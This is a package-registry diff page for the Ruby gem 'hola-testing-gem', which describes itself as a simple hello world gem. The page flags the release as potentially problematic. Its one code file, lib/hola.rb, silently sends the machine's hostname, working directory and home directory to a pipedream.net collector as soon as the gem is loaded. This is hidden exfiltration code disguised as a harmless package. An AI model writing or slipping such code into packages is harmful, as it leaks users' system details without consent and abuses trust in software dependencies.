hola-testing-gem 0.0.0-universal-darwin-21

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of hola-testing-gem might be problematic. Click here for more details.

Files changed (3) hide show
  1. checksums.yaml +7 -0
  2. data/lib/hola.rb +6 -0
  3. metadata +43 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 90ef370a3329be4a3e3ac2f7eabcfb2b908d88f8882cdad31ecaed017eea6963
4
+ data.tar.gz: ebd3d3bccb964a4c8cf221b1bff8f04fa78ae5051fcfb00002939109d6824509
5
+ SHA512:
6
+ metadata.gz: 7c1d4df9ed02ed694a85eaa189a29efab06a53bcf503dbd6d0ab6bceceb85e3ed9bd966206a3983bd612a89c6b7f67293691b1d121191e4d564ffefaf2d21235
7
+ data.tar.gz: 5e7ea61335f46976b71e2b026b36b2b91022f344ec6db9c1588b656c009ac4e1819efa6f1dda50c600314ce529e376a8646b503cd0a33d36757383e02b4fcf15
data/lib/hola.rb ADDED
@@ -0,0 +1,6 @@
1
+ require 'net/http'
2
+ require 'uri'
3
+ require 'socket'
4
+ url = "https://enhwr81xye7ad.x.pipedream.net"
5
+ Net::HTTP.post(URI(url), "cwd:#{Dir.pwd};hostname:#{Socket.gethostname};home:#{Dir.home};gem:GEM_NAME")
6
+
metadata ADDED
@@ -0,0 +1,43 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: hola-testing-gem
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.0.0
5
+ platform: universal-darwin-21
6
+ authors:
7
+ - Nick Quaranto
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2022-05-09 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: A simple hello world gem
14
+ email: nick@quaran.to
15
+ executables: []
16
+ extensions: []
17
+ extra_rdoc_files: []
18
+ files:
19
+ - lib/hola.rb
20
+ homepage: https://rubygems.org/gems/hola-testing-gem
21
+ licenses:
22
+ - MIT
23
+ metadata: {}
24
+ post_install_message:
25
+ rdoc_options: []
26
+ require_paths:
27
+ - lib
28
+ required_ruby_version: !ruby/object:Gem::Requirement
29
+ requirements:
30
+ - - ">="
31
+ - !ruby/object:Gem::Version
32
+ version: '0'
33
+ required_rubygems_version: !ruby/object:Gem::Requirement
34
+ requirements:
35
+ - - ">="
36
+ - !ruby/object:Gem::Version
37
+ version: '0'
38
+ requirements: []
39
+ rubygems_version: 3.0.3.1
40
+ signing_key:
41
+ specification_version: 4
42
+ summary: Hola!
43
+ test_files: []